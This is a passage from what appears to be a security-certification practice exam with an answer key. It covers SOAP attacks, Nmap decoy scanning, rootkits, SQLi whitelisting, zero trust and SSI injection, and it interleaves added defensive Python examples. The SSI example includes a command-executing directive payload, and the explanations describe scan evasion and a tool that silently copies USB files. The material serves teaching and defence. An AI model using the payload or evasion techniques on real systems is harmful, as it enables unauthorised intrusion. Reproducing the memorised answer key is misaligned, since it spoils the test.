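    """Read the live values on a Windows host (needs the winreg module); absent values map to None."""
    if sys.platform != "win32":
        raise RuntimeError("registry audit only runs on Windows; pass a dict to audit_ntlm_settings")
    import winreg

    def query(key_path, name):
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
                return winreg.QueryValueEx(key, name)[0]
        except FileNotFoundError:
            return None

    return {
        "LmCompatibilityLevel": query(LSA_KEY, "LmCompatibilityLevel"),
        "NtlmMinClientSec": query(MSV1_0_KEY, "NtlmMinClientSec"),
        "RestrictSendingNTLMTraffic": query(MSV1_0_KEY, "RestrictSendingNTLMTraffic"),
    }


if __name__ == "__main__":
    values = read_ntlm_settings() if sys.platform == "win32" else SAMPLE_DOWNGRADED
    for severity, finding in audit_ntlm_settings(values) or [("ok", "no NetNTLMv1 exposure found")]:
        print(f"[{severity}] {finding}")
```

Run on a Windows host it reads the live values; elsewhere it audits the constructed downgraded sample. A "high" finding on a workstation that was compliant yesterday is worth correlating with who held local administrator rights in between.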
Question 46 of 65
46. Question
This attack exploits a vulnerability that provides additional routing information in the SOAP header to support asynchronous communication. Also, it further allows the transmission of web-service requests and response messages using different TCP connections. Which of the following attacks matches the description above?
Correct
https://www.ws-attacks.org/WS-Addressing_spoofing The WS-Addressing standard allows routing information to be added to the SOAP Header, enabling asynchronous communication.

WS-Address spoofing – Generic: The generic definition describes the following scenario. An attacker sends a SOAP message containing WS-Addressing information to a web service server. The element does not contain the address of the attacker but instead that of the web service client the attacker has chosen to receive the message. This results in unwanted traffic/SOAP messages for the receiving web service client. Depending on the amount of traffic, DoS scenarios are possible; other attack scenarios are possible too.

WS-Address spoofing – BPEL Rollback: This subtype requires the existence of some sort of BPEL engine. Let's assume that an attacker sends SOAP messages to a web service, resulting in the creation of new BPEL process instances. Each SOAP message contains an element with an invalid callback endpoint. After the SOAP message is processed by the BPEL engine, the engine tries to call the endpoint defined in that element. This action results in some form of error response, such as refused connections or SOAP faults, which in turn is processed by the BPEL engine. If a BPEL engine is flooded with many such SOAP messages, a high workload for the engine results; in the worst case, a DoS. This kind of flooding attack is far more devastating than regular flooding attacks, since one message results in multiple actions/web service calls made by the BPEL engine. The attack only becomes visible once all stages of the BPEL engine have been run through.

Incorrect answers: SOAPAction spoofing https://www.ws-attacks.org/SOAPAction_Spoofing Each web service request contains some sort of operation that is later executed by the application logic. This operation can be found in the first child element of the SOAP Body. However, if HTTP is used to transport the SOAP message, the SOAP standard allows an additional HTTP header called SOAPAction. This header contains the name of the operation to be executed and is supposed to inform the receiving web service of what operation is contained in the SOAP Body without any XML parsing. This "optimisation" can be used by an attacker to mount an attack, since certain web service frameworks determine the operation to be executed solely from the SOAPAction header. XML Flooding https://www.ws-attacks.org/XML_Flooding XML Flooding (also known as XML Flood) aims at exhausting the resources of a web service by sending a large number of legitimate SOAP messages. This attack can be compared to the classical denial-of-service attack on web servers: flooding them with a large number of valid HTTP requests until the server is unable to respond. SOAP Array Attack https://www.ws-attacks.org/Soap_Array_Attack SOAP messages are flexible in many ways; even arrays are supported. If you are new to SOAP arrays, check the documentation by the W3C. However, this feature can be exploited by an attacker to cause a denial of service that limits the web service's availability. Before a SOAP array is used, its size has to be declared, just as in many programming languages. By default, SOAP does not limit the number of elements within an array. This property can be exploited by an attacker to execute a DoS attack limiting the availability of the web service. Let's assume an attacker declares an array with 1,000,000,000 String elements. Before the message is processed any further by the parser, the web service will reserve space for 1,000,000,000 String elements in RAM. In most cases that will lead to memory exhaustion of the attacked system.
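A server-side mitigation for the WS-Addressing spoofing described above: before a service (or its BPEL engine) calls back to the endpoints carried in the SOAP header, it checks each one against an allow-list of clients it is permitted to contact, and caps the envelope size before parsing as a cheap defence against the flooding and array cases. This is an added example, not code from the quiz or from ws-attacks.org; it uses the standard WS-Addressing header elements ReplyTo and FaultTo, and the envelopes, allow-list and size limit are constructed.

```python
"""Guard against WS-Addressing spoofing: validate ReplyTo/FaultTo callback
endpoints against an allow-list before honouring them. Added example; the
envelopes and allow-list are constructed."""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

SOAP_NAMESPACES = ("http://schemas.xmlsoap.org/soap/envelope/",   # SOAP 1.1
                   "http://www.w3.org/2003/05/soap-envelope")      # SOAP 1.2
WSA_NS = "http://www.w3.org/2005/08/addressing"
WSA_ANONYMOUS = WSA_NS + "/anonymous"   # "reply on this connection": never a third party
CALLBACK_ELEMENTS = ("ReplyTo", "FaultTo")
MAX_ENVELOPE_BYTES = 64 * 1024          # constructed limit; refuse oversized envelopes before parsing

# Constructed: callbacks to an approved client, faults returned on the same connection.
LEGIT_ENVELOPE = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                    xmlns:wsa="http://www.w3.org/2005/08/addressing">
  <soap:Header>
    <wsa:ReplyTo><wsa:Address>https://client.example.net/callback</wsa:Address></wsa:ReplyTo>
    <wsa:FaultTo><wsa:Address>http://www.w3.org/2005/08/addressing/anonymous</wsa:Address></wsa:FaultTo>
  </soap:Header>
  <soap:Body><Order xmlns="urn:example">42</Order></soap:Body>
</soap:Envelope>"""

# Constructed: the spoofing pattern above; both callbacks point at hosts the
# sender chose rather than at the sender itself.
SPOOFED_ENVELOPE = LEGIT_ENVELOPE.replace(
    "https://client.example.net/callback", "https://third-party.example.org/service"
).replace("http://www.w3.org/2005/08/addressing/anonymous", "http://203.0.113.5/faults")


def callback_addresses(envelope_xml):
    """Return {element_name: address} for each ReplyTo/FaultTo in the SOAP Header.
    Raises ET.ParseError on malformed XML. For untrusted input in production,
    parse with defusedxml (entity-expansion protection); the size cap in
    check_callbacks is only a first line of defence."""
    root = ET.fromstring(envelope_xml)
    found = {}
    for soap_ns in SOAP_NAMESPACES:
        header = root.find(f"{{{soap_ns}}}Header")
        if header is None:
            continue
        for name in CALLBACK_ELEMENTS:
            addr = header.find(f"{{{WSA_NS}}}{name}/{{{WSA_NS}}}Address")
            if addr is not None and addr.text:
                found[name] = addr.text.strip()
    return found


def check_callbacks(envelope_xml, allowed_hosts):
    """Return (ok, reasons). ok is False if the envelope is oversized or malformed,
    or if any callback endpoint is neither the anonymous address nor an https URL
    whose host is on the allow-list. Only then may the service dispatch callbacks."""
    if len(envelope_xml.encode()) > MAX_ENVELOPE_BYTES:
        return False, ["envelope exceeds size limit"]
    try:
        callbacks = callback_addresses(envelope_xml)
    except ET.ParseError as exc:
        return False, [f"malformed XML: {exc}"]
    reasons = []
    for name, address in callbacks.items():
        if address == WSA_ANONYMOUS:
            continue
        parts = urlsplit(address)
        if parts.scheme != "https":
            reasons.append(f"{name}: callback {address} is not https")
        elif parts.hostname not in allowed_hosts:
            reasons.append(f"{name}: host {parts.hostname!r} is not an approved callback target")
    return (not reasons), reasons


if __name__ == "__main__":
    allowed = {"client.example.net"}   # constructed allow-list of callback hosts
    for label, env in (("legit", LEGIT_ENVELOPE), ("spoofed", SPOOFED_ENVELOPE)):
        ok, reasons = check_callbacks(env, allowed)
        print(label, "accepted" if ok else "rejected", reasons)
```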
Question 47 of 65
47. Question
Your company started working with a cloud service provider, and after a while, they were disappointed with their service and wanted to move to another CSP. Which of the following can become a problem when changing to a new CSP?
Correct
https://jaychapel.medium.com/how-much-should-enterprises-worry-about-vendor-lock-in-in-public-cloud-5029bf40fffa The vendor lock-in problem in cloud computing is the situation where customers are dependent (i.e., locked in) on a single cloud service provider's (CSP's) technology implementation and cannot easily move to a different vendor without substantial costs or technical incompatibilities.

Types of vendor lock-in risks: The issue with vendor lock-in is the difficulty of moving to another cloud service provider if something goes awry. You hope this never has to happen, but it's a possibility. There are four primary lock-in risks you take on by working with a single cloud provider:
1. Data transfer risk
2. Application transfer risk
3. Infrastructure transfer risk
4. Human resource knowledge risk

Data transfer risk: It is not easy to move your data from one CSP to another. A myriad of questions will arise during a data migration, such as:
1. Who is responsible for extracting the data from the cloud databases and data warehouses?
2. In what format will the data be? Will that format work with the new cloud provider, or will significant changes need to be made to the data?
3. How can the data be transferred without loss of application functionality?
4. How long will it take, and how much will it cost, to move all of this data?
While some industry groups have tried to create standards for data interchange, companies sometimes find them difficult to implement because of their unique business requirements.

Application transfer risk: If you build an application on one CSP that leverages many of its offerings, reconfiguring it to run natively on another provider can be an extremely expensive and difficult process. For instance, let's say you've developed a business intelligence platform on Microsoft Azure. You leverage basic cloud services like compute, storage, databases, and networking. But the app also includes Azure's machine learning, data lake analytics, and bot services. Can you imagine all the changes you'll have to make to your application if you had to move it to another CSP? One reason for this difficulty is a lack of standard interfaces and open APIs: every CSP has its own proprietary specifications and standards, which make it very tough to move from one to another. Another reason is that technology and customer needs change so rapidly. You know firsthand that your customers and partners continuously demand changes and improvements to your product. The faster you add and edit features of your cloud-native application, the more deeply entrenched you become with your CSP, and the tougher it will be to move to another cloud vendor.

Infrastructure transfer risk: Every major CSP does things a little differently. Virtual machine formats and their associated pricing vary from vendor to vendor, making it difficult to ensure that you have the appropriate resource usage and cost savings if you switch providers. Database offerings and formats may differ as well, and one cloud provider may have more attractive offerings in certain infrastructure components while lacking other services you may need. These differences in the underlying infrastructure make moving from one cloud service provider to another difficult.

Human resource knowledge risk: If you've been working with a single CSP, your IT team has likely gained a lot of institutional knowledge about that provider's tools and configurations. If you have to move your applications to another CSP, it will take time for your engineers to ramp up on the new cloud platform: they'll have to learn new infrastructure formats, implementation processes, and more. Additionally, any newly required certifications will take a long time to earn. The knowledge risk isn't often thought about, but it is just as important as the risks highlighted above.
Incorrect
https://jaychapel.medium.com/how-much-should-enterprises-worry-about-vendor-lock-in-in-public-cloud-5029bf40fffa The vendor lock-in problem in cloud computing is the situation where customers are dependent (i.e. locked-in) on a single cloud service provider (CSP) technology implementation and cannot easily move to a different vendor without substantial costs or technical incompatibilities. Types of vendor lock-in risks The issue with vendor lock-in is the difficulty in moving to another cloud service provider if something goes awry. You hope that this never has to happen, but its a possibility. There are four primary lock-in risks that youll take working with a single cloud provider. These include: 1. Data transfer risk 2. Application transfer risk 3. Infrastructure transfer risk 4. Human resource knowledge risk Data transfer risk It is not easy to move your data from one CSP to another. A myriad of questions will arise during a data migration process, such as: 1. Who is responsible for extracting the data from the cloud databases and data warehouses? 2. In what format will the data be? Will that format work with the new cloud provider, or will significant changes need to be made to the data? 3. How can the data be transferred without loss of application functionality? 4. How long will it take and how much will it cost to move all of this data? While some industry groups have tried to create standards for data interchange, sometimes its difficult for companies to implement them due to their unique business requirements. Application transfer risk If you build an application on one CSP that leverages many of its offerings, the reconfiguration of this application to run natively on another provider can be an extremely expensive and difficult process. For instance, lets say youve developed a business intelligence platform on Microsoft Azure. You leverage basic cloud services like compute, storage, databases, and networking. 
But the app also includes Azures machine learning, data lake analytics, and bot services. Can you imagine all the changes youll have to make to your application if you had to move this to another CSP? One reason for this difficulty is a lack of standard interfaces and open APIs. Every CSP has their own proprietary specifications and standards, which make it very tough to move from one to another. Another reason is that technology and customer needs change so rapidly. You know first hand that your customers and partners continuously demand changes and improvements to your product. The faster that you add and edit features of your cloud-native application, the deeper entrenched you get with your CSP, and the tougher it will be to move to another cloud vendor. Infrastructure transfer risk Every major CSP does things a little bit differently. Virtual machine formats and their associated pricing vary from vendor to vendor, making it difficult to ensure that you have the appropriate resource usage and cost savings if you switch providers. Database offerings and formats may differ as well. And one cloud provider may have more attractive offerings in certain infrastructure components, while lacking in other services that you may need. These differences in the underlying infrastructure result in difficulties moving from one cloud service provider to another. Human resource knowledge risk If youve been working with a single CSP, your IT team has likely gained a lot of institutional knowledge about that providers tools and configurations. If you have to move your applications to another CSP, it will take time for your engineers to ramp up their knowledge of the new cloud platform. Theyll have to learn about new infrastructure formats, implementation processes, and more. Additionally, any newly required certifications will take a long time to earn. The knowledge risk is a factor that isnt often thought about, but is just as important as the risks highlighted above.
Question 48 of 65
48. Question
In which of the following cloud service models do you take full responsibility for the maintenance of the cloud-based resources?
Correct
https://www.intel.ru/content/www/ru/ru/cloud-computing/as-a-service.html
IaaS (Infrastructure as a Service)
IaaS is on-demand access to cloud-hosted computing infrastructure (servers, storage capacity, and networking resources) that customers can provision, configure and use in much the same way as they use on-premises hardware. The difference is that the cloud service provider hosts, manages and maintains the hardware and computing resources in its own data centers. IaaS customers use the hardware via an internet connection and pay for that use on a subscription or pay-as-you-go basis.
PaaS (Platform as a Service)
PaaS provides a cloud-based platform for developing, running and managing applications. The cloud service provider hosts, manages and maintains all the hardware and software included in the platform (servers for development, testing and deployment, operating system (OS) software, storage, networking, databases, middleware, runtimes, frameworks, development tools) as well as related services for security, operating system and software upgrades, backups and more.
SaaS (Software as a Service)
SaaS is cloud-hosted, ready-to-use application software. Users pay a monthly or annual fee to use a complete application from within a web browser, desktop client, or mobile app. The application and all of the infrastructure required to deliver it (servers, storage, networking, middleware, application software, data storage) are hosted and managed by the SaaS vendor.
BaaS (Backend as a Service)
BaaS takes care of all the backend services of an application, so the developers can focus only on writing and maintaining the frontend side of the application. It provides backend services like database management, user authentication, cloud storage, hosting on the cloud, push notifications, etc.
Question 49 of 65
49. Question
You need to hide the file in the Linux system. Which of the following characters will you type at the beginning of the filename?
Question 50 of 65
50. Question
Alex received an order to conduct a pentest and scan a specific server. When receiving the technical task, he noticed the point: "The attacker must scan every port on the server several times using a set of spoofed source IP addresses." Which of the following Nmap flags will allow Alex to fulfill this requirement?
Correct
https://linux.die.net/man/1/nmap
-D decoy1[,decoy2][,ME][,...] (Cloak a scan with decoys). Causes a decoy scan to be performed, which makes it appear to the remote host that the host(s) you specify as decoys are scanning the target network too. Thus their IDS might report 5-10 port scans from unique IP addresses, but they won't know which IP was scanning them and which were innocent decoys. While this can be defeated through router path tracing, response-dropping, and other active mechanisms, it is generally an effective technique for hiding your IP address. Separate each decoy host with commas, and you can optionally use ME as one of the decoys to represent the position for your real IP address. If you put ME in the sixth position or later, some common port scan detectors (such as Solar Designer's excellent Scanlogd) are unlikely to show your IP address at all. If you don't use ME, Nmap will put you in a random position. You can also use RND to generate a random, non-reserved IP address, or RND:number to generate number addresses.
Incorrect answers:
-f (fragment packets); --mtu (using the specified MTU). The -f option causes the requested scan (including ping scans) to use tiny fragmented IP packets. The idea is to split up the TCP header over several packets to make it harder for packet filters, intrusion detection systems, and other annoyances to detect what you are doing. Be careful with this! Some programs have trouble handling these tiny packets. The old-school sniffer named Sniffit segmentation faulted immediately upon receiving the first fragment. Specify this option once, and Nmap splits the packets into eight bytes or less after the IP header. So a 20-byte TCP header would be split into three packets: two with eight bytes of the TCP header, and one with the final four. Of course each fragment also has an IP header. Specify -f again to use 16 bytes per fragment (reducing the number of fragments).
-S IP_Address (Spoof source address). In some circumstances, Nmap may not be able to determine your source address (Nmap will tell you if this is the case). In this situation, use -S with the IP address of the interface you wish to send packets through.
-A (Aggressive scan options). This option enables additional advanced and aggressive options. I haven't decided exactly which it stands for yet. Presently this enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute). More features may be added in the future. The point is to enable a comprehensive set of scan options without people having to remember a large set of flags. However, because script scanning with the default set is considered intrusive, you should not use -A against target networks without permission. This option only enables features, and not timing options (such as -T4) or verbosity options (-v) that you might want as well.
Question 51 of 65
51. Question
Which of the following is a rootkit that adds additional code or replaces portions of the core operating system to obscure a backdoor on a system?
Correct
https://en.wikipedia.org/wiki/Rootkit
Kernel-level rootkit: The kernel is the core of the operating system, and kernel-level rootkits are created by adding additional code or replacing portions of the core operating system with modified code via device drivers (in Windows) or loadable kernel modules (Linux). Kernel-level rootkits can have a serious effect on the stability of the system if the kit's code contains bugs. Kernel rootkits are difficult to detect because they have the same privileges as the operating system, and therefore they can intercept or subvert operating system operations.
Incorrect answers:
Application-level rootkit: Application-level rootkits operate inside the victim computer by replacing standard application files with rootkit files, or changing the behaviour of present applications with patches, injected code, etc.
Hypervisor-level rootkit: Hypervisor (virtualized) level rootkits are created by exploiting hardware features such as Intel VT or AMD-V (hardware-assisted virtualization technologies). Hypervisor-level rootkits host the target operating system as a virtual machine and therefore can intercept all hardware calls made by the target operating system.
User-mode rootkit: User-mode rootkits run along with other applications as user, rather than low-level system, processes. They have a number of possible installation vectors to intercept and modify the standard behavior of application programming interfaces (APIs). Some inject a dynamically linked library (such as a .DLL file on Windows, or a .dylib file on Mac OS X) into other processes, and are thereby able to execute inside any target process to spoof it; others with sufficient privileges simply overwrite the memory of a target application.
Question 52 of 65
52. Question
Which antenna is commonly used in communications for a frequency band of 10 MHz to VHF and UHF?
Correct
https://en.wikipedia.org/wiki/Yagi%E2%80%93Uda_antenna
A Yagi-Uda antenna, or simply Yagi antenna, is a directional antenna consisting of two or more parallel resonant antenna elements in an end-fire array; these elements are most often metal rods acting as half-wave dipoles. Yagi-Uda antennas consist of a single driven element connected to a radio transmitter and/or receiver through a transmission line, and additional "parasitic elements" with no electrical connection, usually including one so-called reflector and any number of directors. It was invented in 1926 by Shintaro Uda of Tohoku Imperial University, Japan, with a lesser role played by his colleague Hidetsugu Yagi.
Reflector elements (usually only one is used) are slightly longer than the driven dipole and placed behind the driven element, opposite the direction of intended transmission. Directors, on the other hand, are a little shorter and placed in front of the driven element in the intended direction. These parasitic elements are typically off-tuned short-circuited dipole elements, that is, instead of a break at the feedpoint (like the driven element) a solid rod is used. They receive and reradiate the radio waves from the driven element but in a different phase determined by their exact lengths. Their effect is to modify the driven element's radiation pattern. The waves from the multiple elements superpose and interfere to enhance radiation in a single direction, increasing the antenna's gain in that direction.
Also called a beam antenna and parasitic array, the Yagi is very widely used as a high-gain antenna on the HF, VHF and UHF bands. It has moderate to high gain depending on the number of elements present, sometimes reaching as high as 20 dBi, in a unidirectional beam pattern. As an end-fire array, it can achieve a front-to-back ratio of up to 20 dB. It retains the polarization common to its elements, usually linear polarization (its elements being half-wave dipoles). It is relatively lightweight, inexpensive and simple to construct. The bandwidth of a Yagi antenna, the frequency range over which it maintains its gain and feedpoint impedance, is narrow, just a few percent of the center frequency, decreasing for models with higher gain, making it ideal for fixed-frequency applications. The largest and best-known use is as rooftop terrestrial television antennas, but it is also used for point-to-point fixed communication links, in radar antennas, and for long distance shortwave communication by shortwave broadcasting stations and radio amateurs.
Question 53 of 65
53. Question
You want to prevent possible SQLi attacks on your site. To do this, you decide to use a practice whereby only a list of entities such as the data type, range, size, and value, which have been approved for secured access, is accepted. Which of the following practices are you going to adopt?
Correct
According to EC-Council courseware:
Whitelist validation: a best practice whereby only the list of entities (i.e., data type, range, size, value, etc.) that have been approved for secured access is accepted. Whitelist validation can also be termed positive validation or inclusion.
Incorrect answers:
Blacklist validation: rejects all malicious inputs that have been disapproved for protected access. Blacklist validation can be challenging, as every content and character of the attack must be interpreted, understood, and anticipated for future attacks as well. Blacklist validation can also be termed negative validation or exclusion.
Output encoding: a validation technique that can be used after input validation. This technique is used to encode the input to ensure that it is properly sanitized before passing it to the database.
Enforcing least privileges: a security best practice whereby the lowest level of privileges is assigned to every account accessing the database. It is recommended not to assign DBA-level or administrator-level access rights to the application. In some critical situations, some applications may require elevated access rights; hence, proper groundwork should be done by the security professionals, who should also figure out the exact requirements of the application.
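As an added example (not code from the EC-Council courseware quoted above), the Python below applies whitelist validation to three request fields, checking data type, range, size and an explicit value set, and then binds the validated values as parameters instead of concatenating them into SQL. A blacklist check is included only for contrast, to show an input that slips past it but not past the whitelist. The field names, the limits, and the in-memory SQLite rows are assumptions made for the demonstration; enforcing least privilege is a setting on the database account itself and is not shown here.

```python
"""Whitelist (positive) input validation in front of a parameterized query.

Added example, not part of the EC-Council courseware. It uses an in-memory
SQLite database with constructed sample rows so that it runs offline.
"""
import re
import sqlite3

# Whitelist rules per field: type, size/range and the closed value set it may take.
# The fields and limits are assumptions for this example.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")   # type (str) + size + character set
ROLE_ALLOWED = {"user", "editor", "admin"}           # explicit value set
MIN_AGE, MAX_AGE = 0, 150                            # numeric range


class ValidationError(ValueError):
    """Raised when an input is not on the whitelist."""


def validate_username(value):
    if not isinstance(value, str) or not USERNAME_RE.fullmatch(value):
        raise ValidationError(f"username rejected: {value!r}")
    return value


def validate_role(value):
    if value not in ROLE_ALLOWED:
        raise ValidationError(f"role rejected: {value!r}")
    return value


def validate_age(value):
    # Data type first, then range: "25", "25 OR 1=1" and 999 all fail.
    if isinstance(value, bool) or not isinstance(value, int):
        raise ValidationError(f"age must be int: {value!r}")
    if not MIN_AGE <= value <= MAX_AGE:
        raise ValidationError(f"age out of range: {value}")
    return value


def passes(validator, value):
    """Convenience wrapper: True if the validator accepts the value."""
    try:
        validator(value)
        return True
    except ValidationError:
        return False


def open_db():
    """Constructed sample data for the demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, role TEXT, age INTEGER)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "admin", 34), ("bob", "user", 41), ("carol", "editor", 29)],
    )
    return db


def find_users(db, username, role, max_age):
    """Whitelist-validate every field, then bind it as a parameter (never concatenate)."""
    name = validate_username(username)
    r = validate_role(role)
    age = validate_age(max_age)
    rows = db.execute(
        "SELECT name FROM users WHERE name = ? AND role = ? AND age <= ?",
        (name, r, age),
    ).fetchall()
    return [row[0] for row in rows]


def blacklist_check(value):
    """The negative (blacklist) approach from the same passage, for contrast.

    It only catches patterns someone thought of in advance: an injection written
    without quotes, comments or the word ' or ' passes straight through.
    """
    bad = ("'", "--", ";", " or ", "/*")
    return not any(b in value.lower() for b in bad)
```

The payload `1 UNION SELECT name FROM users` contains none of the blacklisted tokens, so `blacklist_check` accepts it, while `validate_username` rejects it simply because spaces are not in the permitted character set; that asymmetry is the practical argument for positive validation.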
Question 54 of 65
54. Question
Which of the following is an automated tool that eases a pentester's work by performing vulnerability scanning to find hosts, services, and other vulnerabilities in the target server?
Correct
https://www.netsparker.com/support/what-is-netsparker/ Netsparker is an automated, yet fully configurable, web application security scanner that enables you to scan websites, web applications, and web services, and identify security flaws. Netsparker can scan all types of web applications, regardless of the platform or the language with which they are built. Netsparker is the only online web application security scanner that automatically exploits identified vulnerabilities in a read-only and safe way, in order to confirm identified issues. It also presents proof of the vulnerability so that you do not need to waste time manually verifying it. For example, in the case of a detected SQL injection vulnerability, it will show the database name as the proof of exploit.
Incorrect answers:
Infoga https://github.com/m4ll0k/Infoga Infoga is a tool that gathers email account information (IP, hostname, country, ...) from different public sources (search engines, PGP key servers and Shodan) and checks whether the emails were leaked, using the haveibeenpwned.com API.
NCollector Studio: an all-in-one offline browser and website ripper/crawler aimed at home users and professionals needing to download specific files from a website, or full websites, for offline browsing.
WebCopier Pro: allows saving complete copies of your favorite sites, magazines, or stock quotes. Companies can transfer their intranet contents to staff computers, create a copy of the company's online catalogs and brochures for sales personnel, back up corporate web sites, and print downloaded files.
Question 55 of 65
55. Question
Identify the technique for securing cloud resources described below: it assumes by default that a user attempting to access the network is not an authentic entity and verifies every incoming connection before allowing access to the network. It also imposes conditions so that employees can access only the resources required for their role.
Correct
https://en.wikipedia.org/wiki/Zero_trust_security_model Zero Trust Network Access (ZTNA) is a category of technologies that provides secure remote access to applications and services based on defined access control policies. Unlike VPNs, which grant complete access to a LAN, ZTNA solutions default to deny, providing only the access to services the user has been explicitly granted.
Incorrect answers:
DMZ https://en.wikipedia.org/wiki/DMZ_(computing) A DMZ or demilitarized zone (sometimes referred to as a perimeter network or screened subnet) is a physical or logical subnetwork that contains and exposes an organization's external-facing services to an untrusted, usually larger, network such as the Internet. The purpose of a DMZ is to add an additional layer of security to an organization's local area network (LAN): an external network node can access only what is exposed in the DMZ, while the rest of the organization's network is firewalled. The DMZ functions as a small, isolated network positioned between the Internet and the private network.
Serverless computing https://en.wikipedia.org/wiki/Serverless_computing Serverless computing is a cloud computing execution model in which the cloud provider allocates machine resources on demand, taking care of the servers on behalf of their customers. Serverless computing does not hold resources in volatile memory; computing is rather done in short bursts with the results persisted to storage. When an app is not in use, there are no computing resources allocated to the app. Pricing is based on the actual amount of resources consumed by an application. It can be a form of utility computing. "Serverless" is a misnomer in the sense that servers are still used by cloud service providers to execute code for developers.
Container technology Container technology, also simply known as a container, is a method to package an application so it can be run, with its dependencies, isolated from other processes. The major public cloud computing providers, including Amazon Web Services, Microsoft Azure and Google Cloud Platform, have embraced container technology, with container software including the popular choices of Docker, Apache Mesos, rkt (pronounced rocket), and Kubernetes.
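To make the "default to deny" contrast with a VPN concrete, here is an added example (not code from the Wikipedia article above, nor from any ZTNA product) of a per-request access decision. Every request must present a valid, unrevoked token, come from a device whose posture passes, and ask for a service that the user's role has been explicitly granted; any check that cannot be made positively results in a deny. A VPN-style decision that grants flat network access once authenticated is shown beside it. The identity store, device posture data, roles and role-to-service grants are all constructed for the demonstration.

```python
"""Default-deny (zero-trust style) access decision evaluated on every request.

Added example; not from the Wikipedia article or any vendor. All tokens,
users, devices and grants below are constructed for the demonstration.
"""
from dataclasses import dataclass

# Constructed identity store: issued session tokens and revoked ones.
VALID_TOKENS = {"tok-alice": "alice", "tok-bob": "bob"}
REVOKED_TOKENS = {"tok-old"}

USER_ROLES = {"alice": "finance", "bob": "engineering"}

# Role -> explicitly granted services. Anything not listed is denied.
ROLE_GRANTS = {
    "finance": {"erp", "payroll"},
    "engineering": {"git", "ci"},
}

# Constructed device posture: only managed and patched devices are trusted.
DEVICE_POSTURE = {
    "laptop-a1": {"managed": True, "patched": True},
    "phone-b2": {"managed": True, "patched": False},
}


@dataclass(frozen=True)
class Request:
    token: str
    device_id: str
    service: str


def zero_trust_decide(req):
    """Return (allowed, reason). The default outcome is deny; every check must pass."""
    if req.token in REVOKED_TOKENS or req.token not in VALID_TOKENS:
        return False, "identity not verified"
    user = VALID_TOKENS[req.token]

    posture = DEVICE_POSTURE.get(req.device_id)
    if posture is None or not (posture["managed"] and posture["patched"]):
        return False, f"device {req.device_id} failed posture check"

    role = USER_ROLES.get(user)
    if req.service not in ROLE_GRANTS.get(role, set()):
        return False, f"{user} ({role}) is not granted {req.service}"

    return True, f"{user} -> {req.service} allowed"


def vpn_style_decide(req):
    """Contrast: once the tunnel is authenticated, the client is 'on the LAN'
    and no per-service or per-device check is made."""
    if req.token in VALID_TOKENS and req.token not in REVOKED_TOKENS:
        return True, "on the LAN; no per-service check"
    return False, "not authenticated"


def compare(req):
    """Both decisions for one request, for side-by-side inspection."""
    return {"vpn": vpn_style_decide(req)[0], "ztna": zero_trust_decide(req)[0]}
```

Note that the unpatched phone and the request for a service outside the user's role are both allowed by the VPN-style check and denied by the zero-trust one; the ordering of checks (identity, then device, then entitlement) is a design choice so that the cheapest and most decisive rejection comes first.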
Question 56 of 65
56. Question
Which of the following USB tools is used to copy files from USB devices silently?
Correct
https://www.ghacks.net/2006/09/15/how-to-dump-all-usb-files-without-the-user-knowing/ USBdumper runs silently as a background process once started and copies the complete contents of every connected usb device to the system without the knowledge of the user. It creates a directory with the current date and begins the background copying process. The user has no indication that the files stored on the USB device are copied from the USB to the local system.
Question 57 of 65
57. Question
Andrew, an evil hacker, researches the website of the company he wants to attack. During the research, he finds a web page and realizes that the company's application is potentially vulnerable to Server-Side Includes injection. Which web-page file type did Andrew find while researching the site?
Correct
https://medium.com/@briskinfosec/server-side-includes-injection-4b2b624393c7 SSIs are directives present on web applications used to feed an HTML page with dynamic content. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes the SSI before supplying the page to the user.
The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary code remotely. It can be exploited through manipulation of SSI in use in the application, or by forcing its use through user input fields. It is possible to check whether the application is properly validating input field data by inserting characters that are used in SSI directives, such as: < ! # = / . " - > and [a-zA-Z0-9]
Another way to discover whether the application is vulnerable is to verify the presence of pages with the extensions .stm, .shtm and .shtml. However, the lack of these types of pages does not mean that the application is protected against SSI attacks. In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access to and manipulation of the file system and processes under the permissions of the web server process owner.
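The two checks the passage describes (the SSI-parsed extensions and the directive characters) can be turned into code. The following is an added example, not code from the linked article: it classifies a URL by extension, finds SSI directives in a piece of input, and shows the same input reflected into a page verbatim versus HTML-encoded, which is the output-encoding step that stops a directive from forming. The directive syntax `<!--#name ... -->` and the extension list come from the text above; the sample page, the `{{name}}` placeholder and the probe payload are constructed.

```python
"""Spotting and neutralizing Server-Side Include directives in user input.

Added example, not code from the linked article. The SSI syntax and the
.stm/.shtm/.shtml extensions come from that text; sample inputs are constructed.
"""
import html
import re
from urllib.parse import urlsplit

SSI_EXTENSIONS = (".stm", ".shtm", ".shtml")

# An SSI directive: HTML comment opener, '#', a directive name, optional
# attributes, comment closer. Whitespace placement varies between servers,
# so the pattern is deliberately loose about it.
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*(\w+)\b[^>]*-->", re.IGNORECASE | re.DOTALL)


def is_ssi_candidate_url(url):
    """True if the path extension is one that web servers commonly parse for SSI."""
    path = urlsplit(url).path.lower()
    return any(path.endswith(ext) for ext in SSI_EXTENSIONS)


def find_ssi_directives(text):
    """Lower-cased directive names found in the text, e.g. ['exec', 'include']."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(text)]


def render_vulnerable(template, user_input):
    """Reflects input verbatim into a page the server will parse for SSI directives."""
    return template.replace("{{name}}", user_input)


def render_safe(template, user_input):
    """HTML-encodes '<', '>', '&' and quotes so that no SSI comment can form in the output."""
    return template.replace("{{name}}", html.escape(user_input, quote=True))


# Constructed page template and a constructed probe payload.
PAGE = "<html><body>Hello, {{name}}!</body></html>"
PAYLOAD = '<!--#exec cmd="id" -->'


def demo():
    """Returns the directive names found in the unsafe and the encoded rendering."""
    return {
        "vulnerable": find_ssi_directives(render_vulnerable(PAGE, PAYLOAD)),
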